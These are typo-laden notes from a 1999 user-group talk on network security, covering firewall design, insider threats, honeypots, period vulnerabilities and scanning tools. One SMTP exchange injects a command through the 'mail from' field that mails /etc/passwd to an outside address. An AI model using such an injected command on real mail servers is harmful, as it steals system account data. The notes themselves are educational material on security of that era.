Member Contributed Articles
1999i: Network Security
(by David Kramer; December 14, 1999)
Network Security - December 14, 1999
Taken by David Kramer
Sun has Kerne threadsm fullyn multiprocessing
very little difference betweek kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.
George Peron(?sp) has small luggable pentiums
How can other companies offer DSL to yhou over your existing lines where the phone companyh can't?
Often they lie, and the can't
They offer slower speeds for poorer cables.
next meet in 4-370 joint with AIP
Michael Hayes and Eric Cole of Vista Info Securities
firstname.lastname@example.org or email@example.com
Lots of F100 companies
pay less for networks and security than for cofee and soft drinks.
hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).
Lots of F100 companies have no security policies, or allow everything outbound.
"Depth of security"- like castles- Always rely on multiple levels of security, some of which are designed merely for detection, some are merly for slowing down attackers.
70% of attacks involve insiders.
Authorizing- Control who can get to what.
Accounting- Recording who has done what.
Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.
Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.
He says this is a bad idea. Don't attract attention.
NT should never be used as a firewall. The OS itself is not secure enough.
Hardening- removing unwanted services, etc.
(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)
Don't put mail server in DMZ. Proxy it to the inside.
There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.
In Netscape, type link://kramer.ne.mediaone.net to find sites that link to your site.
www.grc.com Gibson Research.
WinNuke- Just type in IP address of Win95/98/NT box and this kills it. Connects to 139 NetBios. It sends out-of-band data that it's not expecting.
mail from: "/bin/mail me@host < /etc/passwd"
.. sender ok
rcpt to: mickeymouse
55o unknown user
354 enter mail .
2.2 frag ICMP kernel panic
SDI-pop2 during IMAP anonymous_login() uid is nobody
SDI wu-ftp will let you execute commands as root if you have write access to the server
Sesquipedalian- DOS Linujx 2.1.89-2.2.3: zero-lenght fragment bug.
procrace- linux 2.2.1 contains a /prov race condition allowing local users to crash the kernel.
L2.0.36+ automount allows normal users to gain root via kernel overflow
Runs on host
Specific rules first, more general rules later.
chains, intricate rules
quality of service routing
ip/port/interface and not (!_
Mason- figures your rules by watching what you do.
next gen packet firewalling
check.pl checks file/dir permissions/setuids.
tiger (under devel)
strobe- old port scanning tool
queso- checks for well-know attacks, not really a port scanner
nessus v.good scanning tools
Saint- like Satan
Cheops checks for OS vulnerabilities
ftpcheck/relaycheck checks for servers that relay
SARA Security Auditor's Research Assistant- like Satan.
BASS Bulk Auditing Security Scanner- Scan several servers.